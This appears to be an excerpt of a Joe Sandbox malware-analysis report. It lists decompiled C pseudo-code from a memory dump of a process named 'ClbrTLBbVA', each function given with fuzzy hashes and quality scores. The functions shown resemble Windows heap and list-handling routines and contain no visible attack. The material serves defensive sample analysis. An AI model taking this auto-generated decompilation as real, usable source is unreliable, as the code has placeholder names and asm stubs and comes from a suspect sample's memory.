                                        • Opcode Fuzzy Hash: 1bef0efe8093052243622fa01c999cca5ad9087b7bbe93b0b2decdf264339074
                                        • Instruction Fuzzy Hash: 9E21F072900654AFC729DF69DC84E6BBBB9EF58740F10016DFA0AC7750D634E901CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E016CAE73(intOrPtr __ecx, void* __edx) {
                                        				intOrPtr _v8;
                                        				void* _t19;
                                        				char* _t22;
                                        				signed char* _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr _t27;
                                        				void* _t31;
                                        				intOrPtr _t36;
                                        				char* _t38;
                                        				signed char* _t42;
                                        
                                        				_push(__ecx);
                                        				_t31 = __edx;
                                        				_v8 = __ecx;
                                        				_t19 = E016C7D50();
                                        				_t38 = 0x7ffe0384;
                                        				if(_t19 != 0) {
                                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        				} else {
                                        					_t22 = 0x7ffe0384;
                                        				}
                                        				_t42 = 0x7ffe0385;
                                        				if( *_t22 != 0) {
                                        					if(E016C7D50() == 0) {
                                        						_t24 = 0x7ffe0385;
                                        					} else {
                                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        					}
                                        					if(( *_t24 & 0x00000010) != 0) {
                                        						goto L17;
                                        					} else {
                                        						goto L3;
                                        					}
                                        				} else {
                                        					L3:
                                        					_t27 = E016C7D50();
                                        					if(_t27 != 0) {
                                        						_t27 =  *[fs:0x30];
                                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                        					}
                                        					if( *_t38 != 0) {
                                        						_t27 =  *[fs:0x30];
                                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                        							goto L5;
                                        						}
                                        						_t27 = E016C7D50();
                                        						if(_t27 != 0) {
                                        							_t27 =  *[fs:0x30];
                                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                        						}
                                        						if(( *_t42 & 0x00000020) != 0) {
                                        							L17:
                                        							_t25 = _v8;
                                        							_t36 = 0;
                                        							if(_t25 != 0) {
                                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                        							}
                                        							_t27 = E01727794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                        						}
                                        						goto L5;
                                        					} else {
                                        						L5:
                                        						return _t27;
                                        					}
                                        				}
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction ID: 683fa0e214f685fb3cbc9b2a71478eb446faaeced0979df4663551c4eadcc426
                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction Fuzzy Hash: 36212672601685CFE7169BACDD44B35BBE9EF04B40F2904A8DD048B7A7E734DC41CA94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E016DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				intOrPtr _v8;
                                        				void* _t19;
                                        				intOrPtr _t29;
                                        				intOrPtr _t32;
                                        				intOrPtr _t35;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t40;
                                        
                                        				_t35 = __edx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t37 = 0;
                                        				_v8 = __edx;
                                        				_t29 = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                        					L3:
                                        					_t19 = _a4 - 4;
                                        					if(_t19 != 0) {
                                        						if(_t19 != 1) {
                                        							L7:
                                        							return _t37;
                                        						}
                                        						if(_t35 == 0) {
                                        							L11:
                                        							_t37 = 0xc000000d;
                                        							goto L7;
                                        						}
                                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                        							_t35 = _v8;
                                        						}
                                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                        						goto L7;
                                        					}
                                        					if(_t29 == 0) {
                                        						goto L11;
                                        					}
                                        					_t32 =  *_t40;
                                        					if(_t32 != 0) {
                                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                        						E016B76E2( *_t40);
                                        					}
                                        					 *_t40 = _t29;
                                        					goto L7;
                                        				}
                                        				_t40 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                        				if(_t40 == 0) {
                                        					_t37 = 0xc0000017;
                                        					goto L7;
                                        				}
                                        				_t35 = _v8;
                                        				 *_t40 = 0;
                                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                        				goto L3;
                                        			}










                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction ID: 4b71096e4941199e7dc30a99f908f94053fa249c575b15d188c4b14a621cc237
                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction Fuzzy Hash: 9D218B72A40A85EFD731CF4EC940E66F7E5EB94A10F2481BEE94A87715D731AD02CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E016DB390(void* __ecx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				signed char _t12;
                                        				signed int _t16;
                                        				signed int _t21;
                                        				void* _t28;
                                        				signed int _t30;
                                        				signed int _t36;
                                        				signed int _t41;
                                        
                                        				_push(__ecx);
                                        				_t41 = _a4 + 0xffffffb8;
                                        				E016C2280(_t12, 0x1798608);
                                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                        				asm("sbb edi, edi");
                                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                        				_v8 = _t36;
                                        				asm("lock cmpxchg [ebx], ecx");
                                        				_t30 = 1;
                                        				if(1 != 1) {
                                        					while(1) {
                                        						_t21 = _t30 & 0x00000006;
                                        						_t16 = _t30;
                                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                        						asm("lock cmpxchg [edi], esi");
                                        						if(_t16 == _t30) {
                                        							break;
                                        						}
                                        						_t30 = _t16;
                                        					}
                                        					_t36 = _v8;
                                        					if(_t21 == 2) {
                                        						_t16 = E016E00C2(0x1798608, 0, _t28);
                                        					}
                                        				}
                                        				if(_t36 != 0) {
                                        					_t16 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                        				}
                                        				return _t16;
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 022a599fc17ef46b6b454dd19f7927cd9c6c390b1632b0d2fc0cfed657cf241f
                                        • Instruction ID: 67f4830600c55e74d7a1e341e5d9075ab79f4f5bbbf595ca02baa4cd6503d758
                                        • Opcode Fuzzy Hash: 022a599fc17ef46b6b454dd19f7927cd9c6c390b1632b0d2fc0cfed657cf241f
                                        • Instruction Fuzzy Hash: 60116B33B061149BCB198E1D9D81A6BB267EBD6730B26413DDD16DB381CD319C02C6D5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E016A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t41;
                                        				intOrPtr* _t46;
                                        				void* _t48;
                                        				intOrPtr _t50;
                                        				intOrPtr* _t60;
                                        				void* _t61;
                                        				intOrPtr _t62;
                                        				intOrPtr _t65;
                                        				void* _t66;
                                        				void* _t68;
                                        
                                        				_push(0xc);
                                        				_push(0x177f708);
                                        				E016FD08C(__ebx, __edi, __esi);
                                        				_t65 = __ecx;
                                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                        				if( *(__ecx + 0x24) != 0) {
                                        					_push( *(__ecx + 0x24));
                                        					E016E95D0();
                                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                        				}
                                        				L6();
                                        				L6();
                                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                                        				E016E95D0();
                                        				_t33 =  *0x17984c4; // 0x0
                                        				L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                        				_t37 =  *0x17984c4; // 0x0
                                        				L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                        				_t41 =  *0x17984c4; // 0x0
                                        				E016C2280(L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17986b4);
                                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                        				_t46 = _t65 + 0xe8;
                                        				_t62 =  *_t46;
                                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                        					_t61 = 3;
                                        					asm("int 0x29");
                                        					_push(_t65);
                                        					_t66 = _t61;
                                        					_t23 = _t66 + 0x14; // 0x8df8084c
                                        					_push( *_t23);
                                        					E016E95D0();
                                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                                        					_push( *_t24);
                                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                        					_t48 = E016E95D0();
                                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                        					return _t48;
                                        				} else {
                                        					 *_t60 = _t62;
                                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                        					 *(_t68 - 4) = 0xfffffffe;
                                        					E016A9325();
                                        					_t50 =  *0x17984c4; // 0x0
                                        					return E016FD0D1(L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                        				}
                                        			}















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 115558620917fb06567da2c75030732ccbd8d00d87a8e0cbfb72a5baadf941bf
                                        • Instruction ID: dc01ac6d103b8ebca1e5fb1c5b32691ae96cd37736ecfc6778a299c63064ddde
                                        • Opcode Fuzzy Hash: 115558620917fb06567da2c75030732ccbd8d00d87a8e0cbfb72a5baadf941bf
                                        • Instruction Fuzzy Hash: 97212872041605DFC722EF68CE44F6AB7BAFF28718F54456CE149866A2CB34E941CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E01734257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr* _t27;
                                        				intOrPtr* _t30;
                                        				intOrPtr* _t31;
                                        				intOrPtr _t33;
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t35;
                                        				void* _t37;
                                        				void* _t38;
                                        				void* _t39;
                                        				void* _t43;
                                        
                                        				_t39 = __eflags;
                                        				_t35 = __edi;
                                        				_push(8);
                                        				_push(0x17808d0);
                                        				E016FD08C(__ebx, __edi, __esi);
                                        				_t37 = __ecx;
                                        				E017341E8(__ebx, __edi, __ecx, _t39);
                                        				E016BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                        				_t18 = _t37 + 8;
                                        				_t33 =  *_t18;
                                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                        					L8:
                                        					_push(3);
                                        					asm("int 0x29");
                                        				} else {
                                        					 *_t27 = _t33;
                                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                        					_t35 = 0x17987e4;
                                        					_t18 =  *0x17987e0; // 0x0
                                        					while(_t18 != 0) {
                                        						_t43 = _t18 -  *0x1795cd0; // 0xffffffff
                                        						if(_t43 >= 0) {
                                        							_t31 =  *0x17987e4; // 0x0
                                        							_t18 =  *_t31;
                                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                        								goto L8;
                                        							} else {
                                        								 *0x17987e4 = _t18;
                                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                        								L016A7055(_t31 + 0xfffffff8);
                                        								_t24 =  *0x17987e0; // 0x0
                                        								_t18 = _t24 - 1;
                                        								 *0x17987e0 = _t18;
                                        								continue;
                                        							}
                                        						}
                                        						goto L9;
                                        					}
                                        				}
                                        				L9:
                                        				__eflags =  *0x1795cd0;
                                        				if( *0x1795cd0 <= 0) {
                                        					L016A7055(_t37);
                                        				} else {
                                        					_t30 = _t37 + 8;
                                        					_t34 =  *0x17987e8; // 0x0
                                        					__eflags =  *_t34 - _t35;
                                        					if( *_t34 != _t35) {
                                        						goto L8;
                                        					} else {
                                        						 *_t30 = _t35;
                                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                        						 *_t34 = _t30;
                                        						 *0x17987e8 = _t30;
                                        						 *0x17987e0 = _t18 + 1;
                                        					}
                                        				}
                                        				 *(_t38 - 4) = 0xfffffffe;
                                        				return E016FD0D1(L01734320());
                                        			}















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e42f238f892327522fa67ffb22cc9d812c5c8f94460c78b188ceabac7de91f10
                                        • Instruction ID: 78196eee02d418fca67aed3e4aee376df3829a08dd51d2548c9f9d19a72cb15d
                                        • Opcode Fuzzy Hash: e42f238f892327522fa67ffb22cc9d812c5c8f94460c78b188ceabac7de91f10
                                        • Instruction Fuzzy Hash: F9216F72505606CFCB29DFA8D400658B7F1FB86324B50C26EC11ADB26BD7319496CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E017246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                        				signed short* _v8;
                                        				unsigned int _v12;
                                        				intOrPtr _v16;
                                        				signed int _t22;
                                        				signed char _t23;
                                        				short _t32;
                                        				void* _t38;
                                        				char* _t40;
                                        
                                        				_v12 = __edx;
                                        				_t29 = 0;
                                        				_v8 = __ecx;
                                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                        				_t38 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                        				if(_t38 != 0) {
                                        					_t40 = _a4;
                                        					 *_t40 = 1;
                                        					E016EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                        					_t22 = _v12 >> 1;
                                        					_t32 = 0x2e;
                                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                        					_t23 = E016DD268(_t38, 1);
                                        					asm("sbb al, al");
                                        					 *_t40 =  ~_t23 + 1;
                                        					L016C77F0(_v16, 0, _t38);
                                        				} else {
                                        					 *_a4 = 0;
                                        					_t29 = 0xc0000017;
                                        				}
                                        				return _t29;
                                        			}

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction ID: f5e51dcc8918cf3b1bf3b79ef2c19f880c5bc2717b01aa5f11205580a74c9d97
                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction Fuzzy Hash: 8311E572904208BBC7159F6DD8808BEF7B9EF95710F1080AEF984CB351DA318D55D7A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E016AC962(char __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t19;
                                        				char _t22;
                                        				intOrPtr _t26;
                                        				intOrPtr _t27;
                                        				char _t32;
                                        				char _t34;
                                        				intOrPtr _t35;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t38;
                                        				signed int _t39;
                                        
                                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                        				_v8 =  *0x179d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                        				_t34 = __ecx;
                                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                        					_t26 = 0;
                                        					E016BEEF0(0x17970a0);
                                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                        					if(E0172F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                        						L9:
                                        						E016BEB70(_t29, 0x17970a0);
                                        						_t19 = _t26;
                                        						L2:
                                        						_pop(_t35);
                                        						_pop(_t37);
                                        						_pop(_t27);
                                        						return E016EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                        					}
                                        					_t29 = _t34;
                                        					_t26 = E0172F1FC(_t34, _t32);
                                        					if(_t26 < 0) {
                                        						goto L9;
                                        					}
                                        					_t38 =  *0x17970c0; // 0x0
                                        					while(_t38 != 0x17970c0) {
                                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                        						_t38 =  *_t38;
                                        						_v12 = _t22;
                                        						if(_t22 != 0) {
                                        							_t29 = _t22;
                                        							 *0x179b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                        							_v12();
                                        						}
                                        					}
                                        					goto L9;
                                        				}
                                        				_t19 = 0;
                                        				goto L2;
                                        			}

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e24dd44c2b2e49f34d7e801bfdba080d4f6fc6740a0906119d617bc959c549a
                                        • Instruction ID: ce23fc96b0d6caeb0097d315b8fc5fd73b5f403e38c550289266966fff287fd0
                                        • Opcode Fuzzy Hash: 3e24dd44c2b2e49f34d7e801bfdba080d4f6fc6740a0906119d617bc959c549a
                                        • Instruction Fuzzy Hash: F911E1313106069BCB28AF6CDC99A6BFBEAFB84610B10052CE94693655DF20EC55CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E016E37F5(void* __ecx, intOrPtr* __edx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t6;
                                        				intOrPtr _t13;
                                        				intOrPtr* _t20;
                                        				intOrPtr* _t27;
                                        				void* _t28;
                                        				intOrPtr* _t29;
                                        
                                        				_t27 = __edx;
                                        				_t28 = __ecx;
                                        				if(__edx == 0) {
                                        					E016C2280(_t6, 0x1798550);
                                        				}
                                        				_t29 = E016E387E(_t28);
                                        				if(_t29 == 0) {
                                        					L6:
                                        					if(_t27 == 0) {
                                        						E016BFFB0(0x1798550, _t27, 0x1798550);
                                        					}
                                        					if(_t29 == 0) {
                                        						return 0xc0000225;
                                        					} else {
                                        						if(_t27 != 0) {
                                        							goto L14;
                                        						}
                                        						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                        						goto L11;
                                        					}
                                        				} else {
                                        					_t13 =  *_t29;
                                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                        						L13:
                                        						_push(3);
                                        						asm("int 0x29");
                                        						L14:
                                        						 *_t27 = _t29;
                                        						L11:
                                        						return 0;
                                        					}
                                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                                        					if( *_t20 != _t29) {
                                        						goto L13;
                                        					}
                                        					 *_t20 = _t13;
                                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                        					asm("btr eax, ecx");
                                        					goto L6;
                                        				}
                                        			}

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54e576dea91b1fb540474eb6eb2f5222225243acf78a7648a18a68fbbfd4e424
                                        • Instruction ID: cf9bd3e6cc132df249dd2d0b8f1393f7add4c0dbfea1ad340b128c800a1020e9
                                        • Opcode Fuzzy Hash: 54e576dea91b1fb540474eb6eb2f5222225243acf78a7648a18a68fbbfd4e424
                                        • Instruction Fuzzy Hash: 4701C472A136119BC3378A1D9D48A27BBE6FFC6A60717426DE9458B315DB30C801C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E016B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                        				char _v8;
                                        				void* _t22;
                                        				void* _t24;
                                        				intOrPtr _t29;
                                        				intOrPtr* _t30;
                                        				void* _t42;
                                        				intOrPtr _t47;
                                        
                                        				_push(__ecx);
                                        				_t36 =  &_v8;
                                        				if(E016DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                        					L10:
                                        					_t22 = 0;
                                        				} else {
                                        					_t24 = _v8 + __ecx;
                                        					_t42 = _t24;
                                        					if(_t24 < __ecx) {
                                        						goto L10;
                                        					} else {
                                        						if(E016DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                        							goto L10;
                                        						} else {
                                        							_t29 = _v8 + _t42;
                                        							if(_t29 < _t42) {
                                        								goto L10;
                                        							} else {
                                        								_t47 = _t29;
                                        								_t30 = _a16;
                                        								if(_t30 != 0) {
                                        									 *_t30 = _t47;
                                        								}
                                        								if(_t47 == 0) {
                                        									goto L10;
                                        								} else {
                                        									_t22 = L016C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t22;
                                        			}

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction ID: c6449c9fd44d0d1c5e39362b619ef7fa284a74708059a763924ab71c1a43ab2a
                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction Fuzzy Hash: CA01FC32740129AFC720DE5ECC81E9B7BADEBC4660F350168BA09CB280EE30DC41C3A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0173C450(intOrPtr* _a4) {
                                        				signed char _t25;
                                        				intOrPtr* _t26;
                                        				intOrPtr* _t27;
                                        
                                        				_t26 = _a4;
                                        				_t25 =  *(_t26 + 0x10);
                                        				if((_t25 & 0x00000003) != 1) {
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push( *((intOrPtr*)(_t26 + 8)));
                                        					_push(0);
                                        					_push( *_t26);
                                        					E016E9910();
                                        					_t25 =  *(_t26 + 0x10);
                                        				}
                                        				if((_t25 & 0x00000001) != 0) {
                                        					_push(4);
                                        					_t7 = _t26 + 4; // 0x4
                                        					_t27 = _t7;
                                        					_push(_t27);
                                        					_push(5);
                                        					_push(0xfffffffe);
                                        					E016E95B0();
                                        					if( *_t27 != 0) {
                                        						_push( *_t27);
                                        						E016E95D0();
                                        					}
                                        				}
                                        				_t8 = _t26 + 0x14; // 0x14
                                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                        				}
                                        				_push( *_t26);
                                        				E016E95D0();
                                        				return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                        			}

                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction ID: 8050e8f2e03a4c0e57dfa7b1b077c09bafe146de6c89ce57976bcf8a14dea261
                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction Fuzzy Hash: C3019672140606BFE721AF69CC84E62FB6EFF94754F004529F25452560C721ECA0CAA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E016A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                        				intOrPtr* _t51;
                                        				intOrPtr _t59;
                                        				signed int _t64;
                                        				signed int _t67;
                                        				signed int* _t71;
                                        				signed int _t74;
                                        				signed int _t77;
                                        				signed int _t82;
                                        				intOrPtr* _t84;
                                        				void* _t85;
                                        				intOrPtr* _t87;
                                        				void* _t94;
                                        				signed int _t95;
                                        				intOrPtr* _t97;
                                        				signed int _t99;
                                        				signed int _t102;
                                        				void* _t104;
                                        
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_push(__edi);
                                        				_t97 = __ecx;
                                        				_t102 =  *(__ecx + 0x14);
                                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                                        					_t102 = _t102 | 0x000007d0;
                                        				}
                                        				_t48 =  *[fs:0x30];
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                        					_t102 = _t102 & 0xff000000;
                                        				}
                                        				_t80 = 0x17985ec;
                                        				E016C2280(_t48, 0x17985ec);
                                        				_t51 =  *_t97 + 8;
                                        				if( *_t51 != 0) {
                                        					L6:
                                        					return E016BFFB0(_t80, _t97, _t80);
                                        				} else {
                                        					 *(_t97 + 0x14) = _t102;
                                        					_t84 =  *0x179538c; // 0x77996828
                                        					if( *_t84 != 0x1795388) {
                                        						_t85 = 3;
                                        						asm("int 0x29");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(0x2c);
                                        						_push(0x177f6e8);
                                        						E016FD0E8(0x17985ec, _t97, _t102);
                                        						 *((char*)(_t104 - 0x1d)) = 0;
                                        						_t99 =  *(_t104 + 8);
                                        						__eflags = _t99;
                                        						if(_t99 == 0) {
                                        							L13:
                                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        							if(__eflags == 0) {
                                        								E017788F5(_t80, _t85, 0x1795388, _t99, _t102, __eflags);
                                        							}
                                        						} else {
                                        							__eflags = _t99 -  *0x17986c0; // 0x12407b0
                                        							if(__eflags == 0) {
                                        								goto L13;
                                        							} else {
                                        								__eflags = _t99 -  *0x17986b8; // 0x0
                                        								if(__eflags == 0) {
                                        									goto L13;
                                        								} else {
                                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                        									__eflags =  *((char*)(_t59 + 0x28));
                                        									if( *((char*)(_t59 + 0x28)) == 0) {
                                        										E016C2280(_t99 + 0xe0, _t99 + 0xe0);
                                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                        										__eflags =  *((char*)(_t99 + 0xe5));
                                        										if(__eflags != 0) {
                                        											E017788F5(0x17985ec, _t85, 0x1795388, _t99, _t102, __eflags);
                                        										} else {
                                        											__eflags =  *((char*)(_t99 + 0xe4));
                                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                                        												 *((char*)(_t99 + 0xe4)) = 1;
                                        												_push(_t99);
                                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                                        												E016EAFD0();
                                        											}
                                        											while(1) {
                                        												_t71 = _t99 + 8;
                                        												 *(_t104 - 0x2c) = _t71;
                                        												_t80 =  *_t71;
                                        												_t95 = _t71[1];
                                        												 *(_t104 - 0x28) = _t80;
                                        												 *(_t104 - 0x24) = _t95;
                                        												while(1) {
                                        													L19:
                                        													__eflags = _t95;
